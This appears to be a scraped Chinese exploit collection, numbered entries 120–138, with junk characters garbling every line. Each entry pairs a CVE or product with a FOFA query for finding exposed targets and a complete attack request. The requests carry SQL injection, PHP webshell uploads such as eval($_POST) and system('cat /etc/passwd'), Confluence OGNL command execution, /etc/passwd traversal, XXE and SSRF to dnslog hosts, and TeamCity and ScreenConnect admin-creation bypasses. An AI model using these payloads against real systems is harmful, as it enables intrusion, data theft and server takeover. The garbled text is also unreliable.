8 H8 y/ c0 n4 S8 zX-Remote-Ip: 1.1.1.1
$ g! {& l+ J; T7 V, }! U, pX-Remote-Addr: 1.1.1.1
% @# Z, m' C, Q* Y7 O! ~; E9 I- kTe: trailers, n: z7 ^2 M& F
Connection: close0 E5 G& E: H% s+ i6 ]4 \( v! h& p, h0 y
+ _7 s; R: `) Asrc=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
) j- o2 ^4 x- k( p& z/ _( D6 M1 P
6 d6 B) }7 e. j& z120. 北京百绰智能S40管理平台导入web.php任意文件上传" [2 M; i7 d F9 a: x% P. ]" d
CVE-2024-12531 [! P/ M# ?' t/ R* t/ G9 x- x" o
FOFA:title="Smart管理平台"
0 c3 i; d2 t$ r# x( kPOST /useratte/web.php? HTTP/1.1+ n0 L2 ?3 B1 s& o* _5 a2 n" n& N
Host: ip:port7 h$ {# J; j1 s
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
# Y" s3 n: n9 S/ t ]5 lUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko8 J9 y4 y- F7 r" g0 W# j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8+ P- s% x) l# ~& I3 M' z5 X
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 q$ ]1 U8 o0 J" n- b. p
Accept-Encoding: gzip, deflate3 j5 O9 x8 r |/ A
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328- a9 y. b; X' h/ A/ z# J
Content-Length: 597
& U" q# w ~5 n O8 i( ROrigin: https://ip:port* i+ ], Z- i8 U2 _, E+ X, u
Referer: https://ip:port/sysmanage/licence.php
8 w7 s' r( U4 p6 z: f7 g0 _Upgrade-Insecure-Requests: 1, d2 L0 \; ]1 v
Sec-Fetch-Dest: document' c: g# o! d7 |
Sec-Fetch-Mode: navigate
" a) [: [0 S3 F7 r* D$ { X7 YSec-Fetch-Site: same-origin
7 k7 ~/ l. B0 a7 L6 ]Sec-Fetch-User: ?1) S$ Z7 J- s0 _2 K6 j9 D
Te: trailers
$ [0 s! ]9 y9 R5 P6 l- b& wConnection: close
8 _, f+ A$ O1 g" } _2 `3 g3 w* F% L. E1 h& {' p
-----------------------------42328904123665875270630079328
: t. s# Q0 H1 h5 }! NContent-Disposition: form-data; name="file_upload"; filename="2.php"
1 i! P. ]2 p/ s8 m4 b! |( ]Content-Type: application/octet-stream
0 }( I* S, s( u8 U6 @* |
: O, K' k, F. T. Q9 E. X! d<?php phpinfo()?>
, {+ A5 y1 x- B% D( \-----------------------------42328904123665875270630079328* L% }8 a7 R1 L) q n+ u% u2 N2 }/ K
Content-Disposition: form-data; name="id_type"
( R2 ^# F+ U2 M6 z* [) j
' ]% |- m" w% R5 f. e1/ \( p0 R2 V3 @4 z$ s$ v v
-----------------------------423289041236658752706300793282 a/ |% H# P8 P5 p
Content-Disposition: form-data; name="1_ck"
5 m1 l' y; N9 A% c9 d
7 J! g, g/ b9 [) s; R9 I1_radhttp
9 `* B! A) }" G: z- w% L-----------------------------42328904123665875270630079328
, p0 Y4 B( u3 `2 {/ EContent-Disposition: form-data; name="mode": J; S. L6 o/ ~" K* h ~
. J) }1 {& G& [ d4 m
import3 q: Y; B) W9 P+ c
-----------------------------42328904123665875270630079328 e4 J/ Q4 z4 x/ S, Q& `
5 G; N8 |2 ~9 a) a
+ ~* e6 z$ w4 H) L7 ]/ V/ N
文件路径/upload/2.php
4 U" h" p. I/ A
+ q$ C( B0 C- r. E) U* `- f121. 北京百绰智能S42管理平台userattestation.php任意文件上传2 w5 r+ v) m7 ^9 }. i2 v8 P
CVE-2024-1918
: F0 a, I1 a5 h+ L9 |FOFA:title="Smart管理平台"
0 l( b- j+ U1 ]" Q- [* hPOST /useratte/userattestation.php HTTP/1.1
0 V. \6 g" O9 A3 \0 h- sHost: 192.168.40.130:8443: u! t8 B# j# @/ l' S
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
9 y# N1 t4 c) b5 p& r% Z6 q3 {User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko N; p r: I) [- Q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8# G1 C) ^3 D6 n2 f
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! x8 i% a" R' M0 D
Accept-Encoding: gzip, deflate
% `4 t5 p) q$ T/ _ X& W8 TContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328" q# R0 `6 K8 {+ L
Content-Length: 5925 \- I/ r+ J7 g# K1 z: n0 Z
Origin: https://192.168.40.130:8443
9 E9 Z7 f8 i: K: N* U- R8 e+ eUpgrade-Insecure-Requests: 1+ a. `1 X( Y/ a/ s8 I
Sec-Fetch-Dest: document& r, |1 s# m0 B, a- t
Sec-Fetch-Mode: navigate
8 y4 W5 X& n \( E. B5 e+ mSec-Fetch-Site: same-origin( ~$ A6 |' t0 {! q' W
Sec-Fetch-User: ?1
$ ^$ p+ @6 \! Q0 I1 fTe: trailers
! w1 n, X4 d% H5 t& B) `Connection: close* C( x% G) V& w% B% ]# Z; i
0 j( g3 d' G3 q8 O+ a6 h! b
-----------------------------42328904123665875270630079328, l/ _6 y; w% v. ^
Content-Disposition: form-data; name="web_img"; filename="1.php"- }. K# }& |' c8 k( j6 @/ L9 B
Content-Type: application/octet-stream
, _0 v+ n% J) w2 t& U1 W( m! G
) }+ \$ M1 i1 y5 T2 H/ [1 @<?php phpinfo();?>
0 e ~4 b8 A6 P+ C-----------------------------42328904123665875270630079328
9 W+ X& r1 j, n% LContent-Disposition: form-data; name="id_type"
- _ \* Z( _5 O+ p: g* Y# }4 X
" j( h$ J# f* c1 H. {" [7 e- n/ g# h: ~" `- Z9 s
-----------------------------42328904123665875270630079328
* g: k* o7 G' w1 ]/ oContent-Disposition: form-data; name="1_ck"
+ `# d, Z' N8 p, P
* ~ B' b" i% X& e1 Y1_radhttp- |+ h6 @; [9 k+ H
-----------------------------42328904123665875270630079328
1 w( A. E& O/ n3 t8 aContent-Disposition: form-data; name="hidwel"2 ?: u: H8 p3 T
! X+ q8 g6 d9 B) _% K
set
. @" [; ~/ e. L9 b1 o-----------------------------42328904123665875270630079328
0 i& z( Y- i# L7 e. e9 \' D0 ^* N2 _9 n2 V$ ]
# t( ~, }+ `5 i" i; s9 n+ o9 pboot/web/upload/weblogo/1.php9 ~1 I5 t) t1 C0 N" x0 ]( G+ Z3 I
& g7 j* H# H& g: a% @/ F: y' j7 y
122. 北京百绰智能s200管理平台/importexport.php sql注入0 m% E$ }% i) [7 K$ I( |; ~0 y" R7 b
CVE-2024-27718FOFA:title="Smart管理平台"
- ]* V) ?" t3 ?2 N2 E( s, F! O其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()/ W, q# [) _6 |9 E5 u
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
* k3 y3 S8 @; a8 \1 R! VHost: x.x.x.x
" U* e' h; j% U }* J) jCookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0% x' d) \# `! Q5 K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.07 u$ E2 i2 o- @7 e w$ _5 |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8- @9 [( F0 o: Q: _
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 Q L+ ^6 L9 D4 T Q6 bAccept-Encoding: gzip, deflate, br% h0 Z& y0 H/ _. ]% T8 _7 G
Upgrade-Insecure-Requests: 1; z: b, ?+ d3 ^ n# Y( S
Sec-Fetch-Dest: document
! i4 J; w( t- v, ~ q7 RSec-Fetch-Mode: navigate, U0 M6 H o2 P, s
Sec-Fetch-Site: none9 u+ [0 K6 u# o7 Z
Sec-Fetch-User: ?1( M. m6 j7 o4 {' z6 x! |
Te: trailers
; m+ r/ q- ]: k8 NConnection: close5 i0 v1 j* P# A
8 {) M6 z- k' p R
# l3 F& h; \" i/ l3 |# {9 k: k123. Atlassian Confluence 模板注入代码执行3 W0 D+ ?5 Z" W# l
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"* Y, c' f4 ]- `# a! E* F3 K
POST /template/aui/text-inline.vm HTTP/1.15 _' \+ k0 b4 o
Host: localhost:8090# m5 ^& P+ x" y9 s; E2 D
Accept-Encoding: gzip, deflate, br- `# E/ b# Q+ L+ V! O2 P% o
Accept: */*' V9 I" U" G/ z8 w/ q0 n
Accept-Language: en-US;q=0.9,en;q=0.8
) m) M; s) n: h. PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.368 J3 B5 o @/ E1 U/ z$ Z
Connection: close* m5 P. v0 I3 Y: S& w
Content-Type: application/x-www-form-urlencoded
" a3 @. B6 o2 l ?6 H7 `7 v+ c9 H- F: a7 Y2 N' C0 M# R( d
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
4 j0 R* E5 k# u0 i6 w/ C3 E+ }) S8 T" \& T( |: g4 X
; Z* @" R8 J# i. h( i( B4 s
124. 湖南建研工程质量检测系统任意文件上传
" W- u- m4 r1 z, l+ r/ d: K" ZFOFA:body="/Content/Theme/Standard/webSite/login.css"" z9 |8 h7 J% s
POST /Scripts/admintool?type=updatefile HTTP/1.1
8 T2 {8 E) B% ~. uHost: 192.168.40.130:8282 }, w" U8 |( s" T
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36# _' V8 c, r' I/ {
Content-Length: 72
! ~; A0 {) d3 b0 x0 R$ u, LAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8( @. ]* l; N; W
Accept-Encoding: gzip, deflate, br3 p' r6 r1 X/ Q( s4 E) x
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
" ^5 f4 W( |. F8 y9 e7 X8 c: s' UConnection: close
% r! G/ u# J+ a2 Y* w1 D# NContent-Type: application/x-www-form-urlencoded- K1 o" s- v3 } ^) x1 Z
4 H4 r1 I' y6 K1 Z3 Z6 X
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
) n4 t5 J3 x7 C! ]" S0 I. O# I' ? s# `8 k5 Q% Y" p2 f
8 K, ?* M8 J. u0 w% o7 S' w+ v9 N; o
http://192.168.40.130:8282/Scripts/abcgcg.aspx; k# `: a4 N( I" x$ T" D
8 J8 j# H7 [- I2 H) p5 `
125. ConnectWise ScreenConnect身份验证绕过' k! g* ^1 k( l* l. K* R( R
CVE-2024-1709! u( `. R, \5 A6 ^" b
FOFA:icon_hash="-82958153"
9 x' @) [( l+ S& h- ihttps://github.com/watchtowrlabs ... bypass-add-user-poc
+ A5 G _+ B% o1 B: ^1 D0 ^6 L" F$ z+ a6 v) U9 K* r
- i3 \, k! n4 i2 P3 |! s使用方法
) f$ ^$ ?3 `" S" k% K) f, W/ Xpython watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
1 h' ^9 H- Q$ k# W7 s( w$ q, ^ N2 `( \: T8 @! t$ m
- z) X9 W2 E3 _# W8 i9 |
创建好用户后直接登录后台,可以执行系统命令。, q/ V& |8 s$ h* x3 ~
2 s* j" O ^; E, c! Q. P126. Aiohttp 路径遍历
* i) o. r/ z' X( S5 gFOFA:title=="ComfyUI"
* b" d# g4 u: j% k7 x8 ?' MGET /static/../../../../../etc/passwd HTTP/1.1
9 A6 h5 ^" r0 _4 L* zHost: x.x.x.x
3 T$ K( M1 |2 c5 UUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.363 K0 L3 _: V1 k$ ~% K# U' Z
Connection: close; S2 z; q( J- o
Accept: */*4 L! X9 E B7 {1 `
Accept-Language: en
1 A' _! `0 X9 U9 G, q$ @Accept-Encoding: gzip3 y) T+ C* a) C8 f7 s7 C
' m" J. S* ?. O5 T t( s. L: @
2 h( B! { v) l1 L127. 广联达Linkworks DataExchange.ashx XXE
0 X4 R' E& ?# A* m7 `FOFA:body="Services/Identification/login.ashx"
0 K) F* Y2 D% j1 m2 L6 H- aPOST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
& x- E+ [, }1 w9 @Host: 192.168.40.130:8888
3 L/ U% S* C4 R# M1 sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36$ L& J5 ]( {7 A5 E
Content-Length: 415
/ {7 p; @9 V8 S" r6 O7 u- zAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7; z9 \* ]% ^$ ?/ ~' i, j; \ A
Accept-Encoding: gzip, deflate
7 w0 |5 g; c* hAccept-Language: zh-CN,zh;q=0.9+ H* C/ w& K2 d
Connection: close7 T8 m; x3 s( T: w
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0 ]! w$ a0 k* {) G8 J0 o) w1 w, P
Purpose: prefetch w |* R4 l2 A- W
Sec-Purpose: prefetch;prerender u8 E- U5 \" S% M
% f H/ l! E) w2 O1 v------WebKitFormBoundaryJGgV5l5ta05yAIe0
9 N; r4 A7 n1 O' U6 q1 A2 L& @Content-Disposition: form-data;name="SystemName"9 a. z1 _$ ^$ C/ N: m& |) C6 S
" \4 {6 J" `3 B" A+ m; f6 a' X
BIM& I8 N c ^8 n
------WebKitFormBoundaryJGgV5l5ta05yAIe0
7 a) q1 _. D/ _; J# H$ s$ EContent-Disposition: form-data;name="Params"
" j6 x4 }4 Y3 Z0 W5 K, D' gContent-Type: text/plain
* ?5 U5 ?/ x7 @8 |& R9 p' g$ i* q. B1 N$ f6 V6 Z7 h1 `
<?xml version="1.0" encoding="UTF-8"?>, j( @ X8 a, l0 B1 e
<!DOCTYPE test [
' ]1 d. P( _, n1 E$ M0 @1 Q$ ?<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
6 Z& v1 C" }+ `% T, l9 j# {]
) i. E6 W9 M4 [/ n; |, K) r>
; w3 h. b2 N8 e# P* P<test>&t;</test>- v/ E) v- B$ Q9 s; v
------WebKitFormBoundaryJGgV5l5ta05yAIe0--7 u l( ~$ p, n8 C/ l2 n3 t
: @/ t% T4 |* i' ]- Y. b" C
* K& ~! c2 X5 V! M5 `
: X2 P7 U' F. @- _1 c5 {
128. Adobe ColdFusion 反序列化# D4 x5 A3 ]/ |8 k/ B7 [2 t7 O# t
CVE-2023-38203) t( F; I9 \% Z1 ~
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
2 A' J8 z4 v. B' u* KFOFA:app="Adobe-ColdFusion"
+ W1 O2 S& G1 Z( X7 c* r4 B% APAYLOAD
9 q: C5 r4 C' d" H f0 }) n* a9 b
* G/ O% q; E# A& N) K129. Adobe ColdFusion 任意文件读取
N8 G8 E2 t/ zCVE-2024-20767' e5 X6 l& P N' U# t2 f O, A
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"- c1 |/ Y" [5 q' g: g
第一步,获取uuid
* u1 G% F# w3 k' `+ H1 jGET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.17 I v: I8 t% S
Host: x.x.x.x9 J* s- G+ b, j
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
. [! l2 X0 M5 S j% ?/ l/ P4 T j: N \Accept: */*
+ \4 i5 K V1 X& F+ H) S8 AAccept-Encoding: gzip, deflate2 F) u; H' l( }/ L. ]' r6 D R
Connection: close
t6 q8 l/ y0 J4 V- O2 f3 m/ X1 {9 J# ?0 S) z- y
! k8 C& B8 _* {8 e* i第二步,读取/etc/passwd文件
6 z" z5 Q+ m+ A2 bGET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
- ~9 i7 c/ T4 ^3 }! D" H# f4 D6 MHost: x.x.x.x Z, e- V8 s! J# s+ D- ~" V. |: L) M/ s
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
- G& C' x0 q0 s0 \Accept: */*
$ c$ ?5 N% [3 O/ AAccept-Encoding: gzip, deflate! X* D, x3 n- }1 z- |+ N
Connection: close8 D- ]; O3 m8 m4 o0 A& X
uuid: 85f60018-a654-4410-a783-f81cbd5000b9
0 L8 v% u; D6 D
2 m- Z, o; z# f4 J" V1 a5 b' ?( n' J
130. Laykefu客服系统任意文件上传
* K0 R4 ]7 Y6 y ~* M# ZFOFA:icon_hash="-334624619"
2 {0 ^1 q/ v" z7 r3 B+ S5 xPOST /admin/users/upavatar.html HTTP/1.1. k3 C2 G, f" ?* O5 S/ }$ T
Host: 127.0.0.1
M* m4 O) M2 ?) j+ T8 t* tAccept: application/json, text/javascript, */*; q=0.01
: P' ~. a" p ^. CX-Requested-With: XMLHttpRequest
( U! o) g- l% ^& w7 i% SUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26+ F6 E# B0 N$ w2 \) H9 {8 L
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR& d& N9 Q- l' n
Accept-Encoding: gzip, deflate7 d |& J' ?, n; }$ ^
Accept-Language: zh-CN,zh;q=0.96 X$ Z+ q9 n; R/ v- e5 G: @8 A. A
Cookie: user_name=1; user_id=3
/ ~ j) T7 M3 u" y$ `Connection: close
) H. t0 k& W7 R( L
% k& @3 V7 ^6 I$ C( ]------WebKitFormBoundary3OCVBiwBVsNuB2kR
+ S! l) u/ C3 JContent-Disposition: form-data; name="file"; filename="1.php"2 \: ?* z2 b6 B; e
Content-Type: image/png( H/ a+ S( Z9 [2 ^$ O8 V0 v
6 a4 Q7 B3 V$ b4 W5 f0 Z- K% @+ c. Y1 T
<?php phpinfo();@eval($_POST['sec']);?>
. ~7 I6 x. g. T8 k' B, f/ v, ?------WebKitFormBoundary3OCVBiwBVsNuB2kR--
* W& j" k! `0 |# K5 C" [
& z+ L: Y3 J9 l: g+ A1 Z$ Q" k5 ?% C6 p9 ~% K& e% S3 n
131. Mini-Tmall <=20231017 SQL注入# v* W& v5 \% t" K H3 z
FOFA:icon_hash="-2087517259"8 k s3 Y2 j2 H1 R7 m
后台地址:http://localhost:8080/tmall/admin; M1 a, F& k1 E& t
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
9 z5 m4 ]) ?. Q/ C! w
" q$ x$ A! |8 z2 M6 I132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
. D/ n( u4 a6 U" c3 HCVE-2024-271983 p2 q0 w1 o: y2 w# I
FOFA:body="Log in to TeamCity". H; p6 J6 Q& ^& N6 h2 t
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1' A- R: T# j# g2 o& P! T
Host: 192.168.40.130:81110 Z* x. B( u W# r2 P1 h" s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.365 z6 V( U8 l7 F, V4 U" o9 W0 Z
Accept: */*
1 g w+ ?6 z/ j4 r( yContent-Type: application/json
9 u" u3 v9 m9 d `% |; @- _Accept-Encoding: gzip, deflate; X& e" p0 T0 D
( d# q& m! c0 M% q0 M
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
/ Y* m# t) t+ D+ ^: r! _( t5 {$ Y6 a1 I& }* |7 c9 p; I- T! C
5 Z# N) W6 G9 f$ @0 n2 P" u. n$ mCVE-2024-27199
. [: n K' v/ p+ B2 y/res/../admin/diagnostic.jsp: w0 B2 k' ^7 r% X2 V B1 H
/.well-known/acme-challenge/../../admin/diagnostic.jsp
( ?1 u6 n- z- R/ F- m$ J$ R5 T4 ]/update/../admin/diagnostic.jsp0 t& E2 i5 d, X. K$ Q# F; H
. u# o0 k. Z& t0 Z* C" @- y+ N
7 Y: U* B+ y8 CCVE-2024-27198-RCE.py" W- X5 [$ }0 D# w% Y6 s
7 z" }! M! z7 Q" T133. H5 云商城 file.php 文件上传
1 A* ]1 ]& K y3 @5 T8 \& L% wFOFA:body="/public/qbsp.php"
5 R2 X8 y/ n7 Z4 @# dPOST /admin/commodtiy/file.php?upload=1 HTTP/1.1
- z. v4 j; }6 q1 N+ R5 h) x: aHost: your-ip
% e" W0 c. T3 d0 OUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
' s6 I5 ~/ T! U9 u8 UContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx
% @$ J4 e2 {5 K3 S( r$ s. u6 x" q9 b: ?
------WebKitFormBoundaryFQqYtrIWb8iBxUCx
5 B" C7 V. p# X# J6 P/ yContent-Disposition: form-data; name="file"; filename="rce.php"" N0 C1 i# k; C' o, \5 N6 t
Content-Type: application/octet-stream
6 |: Z/ b4 m# P& V) q( m
0 s7 O# Q( y! \) F# v# t7 i/ ]5 |<?php system("cat /etc/passwd");unlink(__FILE__);?>
7 b- x2 a( H+ R( O ^' }------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
J6 m, X" ? _" S
0 @) d/ x: n: o- k* U+ x+ x J
# P" w' W6 w$ I9 o2 H: m' A
1 c Z4 F; P b* S4 Q134. 网康NS-ASG应用安全网关index.php sql注入: A. N. u) F6 o4 ]6 n' j: I
CVE-2024-2330' O2 X7 r" M& p H" s1 b4 X
Netentsec NS-ASG Application Security Gateway 6.3版本
@' X) F, E. A' k* C$ ?8 K- NFOFA:app="网康科技-NS-ASG安全网关"
$ _( r# o; d: [# hPOST /protocol/index.php HTTP/1.13 f, P H9 ^: b5 m# v% s9 C2 ~
Host: x.x.x.x
* M* e7 H) q. n1 S7 r4 ^Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de3 I- Q4 _$ D4 ?# V" X& v
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0' {2 T3 v I8 b, ]% i
Accept: */*
* r6 J0 ~0 ^5 l1 t3 LAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ l+ D c8 C: }; y; p$ cAccept-Encoding: gzip, deflate2 }( @, ]' R O% l: z
Sec-Fetch-Dest: empty
( c8 {, r y. W3 _/ N9 ESec-Fetch-Mode: cors( J$ Q7 u+ D2 a" l0 J/ l- ?" g+ c1 f
Sec-Fetch-Site: same-origin" n( W4 b, t9 o7 y' F+ R$ Q
Te: trailers
- G+ c& I& E# w8 w: PConnection: close" `0 U% i" `3 L; v
Content-Type: application/x-www-form-urlencoded
$ X$ I6 q' n+ D% O+ H# M4 vContent-Length: 263
+ B* Z0 W: `0 \; Z; D
6 w! l. f9 ?" o8 b+ y' vjsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
! b( U( f) j9 [* X" |
* }5 i1 w5 w' Y0 |( {% m7 N* P8 F0 Y! r5 d* U0 |) r
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
4 |3 F' V- {1 `; f4 y1 L- m) lCVE-2024-2022/ V( y9 m5 k3 p3 ~; G& t
Netentsec NS-ASG Application Security Gateway 6.3版本
6 c9 A8 G5 K5 M5 E2 T3 h( q. `FOFA:app="网康科技-NS-ASG安全网关"
7 }5 ~6 J9 }$ a/ a1 SGET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.14 V& @5 J- }8 ?+ {1 z
Host: x.x.x.x* l1 s1 _5 c1 N) Q5 x0 V; l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
9 z6 P3 e0 y GAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7& _* ^2 ]1 z( h( T u+ L
Accept-Encoding: gzip, deflate; t' h7 R; j# T) T/ a2 ?" v- m
Accept-Language: zh-CN,zh;q=0.9' [& V3 Q7 v- ]% O1 Y
Connection: close9 T- W2 I) ]6 ?2 E
9 U/ j; V& p& d9 D: _+ u" W4 h! Z! Z5 k: ]0 L
136. NextChat cors SSRF
& e. u7 U+ W/ ~& a7 A3 _+ `CVE-2023-49785
6 q# l4 ]3 e- ^0 F1 D) w4 `FOFA:title="NextChat"
3 @) s; l3 y$ _8 X7 h) t& e0 Y1 @GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
3 ]1 V! Z, v, ] F0 ^ I9 i9 dHost: x.x.x.x:10000
% \" |3 m& t/ \! i. dUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
% }+ w @. H v) o: EConnection: close" L0 _% u. b3 p Y% J
Accept: */*0 `6 f$ o8 y8 s
Accept-Language: en
; b/ `. `& b7 V+ ?) \Accept-Encoding: gzip
+ W- a( U2 I4 K$ Z
' i k0 N/ m2 g+ f7 A R% G5 x% l9 h) G* J
137. 福建科立迅通信指挥调度平台down_file.php sql注入
* d; w a* b- ?& ?1 h4 pCVE-2024-2620
9 g- F y. y% O( F3 pFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
" ~5 _6 l4 U, o+ o; w& k5 |) q. z- JGET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
" [% l) F5 _: V, o+ b2 ^! I3 JHost: x.x.x.x
5 ^# ^ w% H- W* b0 M& @( hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
# Z% H2 |) I0 w3 |Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.85 J+ O8 Y3 ~* r! D! X
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 A, u4 O$ B# FAccept-Encoding: gzip, deflate, br
% i3 @/ v0 k; _: B$ `) p3 {Connection: close
$ Y/ `3 P% v, E0 H& k+ C) }Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
" Z; P0 ~ y0 _0 J' ~Upgrade-Insecure-Requests: 1- s1 h" c) c: }. q1 ?
% s2 N( `" v( A+ a. p9 M8 [1 o" m
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
7 C* t: [1 s9 E* ~ ACVE-2024-2621
- b) p( f6 s( nFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
, A5 r0 X0 t" gGET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1: Y$ N5 u1 C- R Z
Host: x.x.x.x, s+ S, x& m1 v7 N, M4 m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0- G! V$ X0 e) A# @" R; Z/ c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
, b7 v7 S: m% E: G# s' DAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 \3 ]5 N( g$ n' ^/ ZAccept-Encoding: gzip, deflate, br
5 S6 y9 O" G6 t0 b; N: \7 tConnection: close
2 ]( }( i+ w9 l6 Y SUpgrade-Insecure-Requests: 1
) l, c% ^* F1 K5 S {( W2 U# [8 s( _; Q
